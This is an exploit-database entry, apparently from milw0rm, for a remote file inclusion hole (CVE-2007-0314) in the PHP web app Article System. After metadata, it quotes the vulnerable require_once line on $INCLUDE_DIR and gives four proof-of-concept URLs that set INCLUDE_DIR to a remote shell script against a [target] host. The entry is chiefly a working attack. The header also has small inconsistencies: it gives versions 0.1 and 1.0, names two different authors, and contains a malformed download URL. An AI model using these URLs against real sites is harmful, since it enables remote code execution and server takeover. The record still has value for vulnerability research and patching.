Article System 0.1 - 'INCLUDE_DIR' Remote File Inclusion
Author: 3l3ctric-Cracker
type: webapps
platform: php
port:
date_added: 2007-01-10
date_updated: 2016-09-21
verified: 1
codes: OSVDB-57300;CVE-2007-0314;OSVDB-57299;OSVDB-57298;OSVDB-57297
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comartsys-0.1-20020705.tar.gz
########################################################################################################################
#Script:Article System #
#Affected Version:1.0 #
#Download:http://kent.dl.sourceforge.net/sourceforge/artsys/artsys-0.1-20020705.tar.gz #
########################################################################################################################
#Author:Dr Max Virus #
########################################################################################################################
#Bug in:/[path]/include #
#Vul Code; #
#require_once ("$INCLUDE_DIR/classes/class.form_item.php"); #
########################################################################################################################
#POC: #
#http://[target]/[script_path]/include/forms.php?INCLUDE_DIR=shell.txt? #
#http://[target]/[script_path]/include/issue_edit.php?INCLUDE_DIR=shell.txt? #
#http://[target]/[script_path]/include/client.php?INCLUDE_DIR=shell.txt? #
#http://[target]/[script_path]/include/classes.php?INCLUDE_DIR=shell.txt? #
########################################################################################################################
#Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends #
#Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk #
########################################################################################################################
# milw0rm.com [2007-01-11]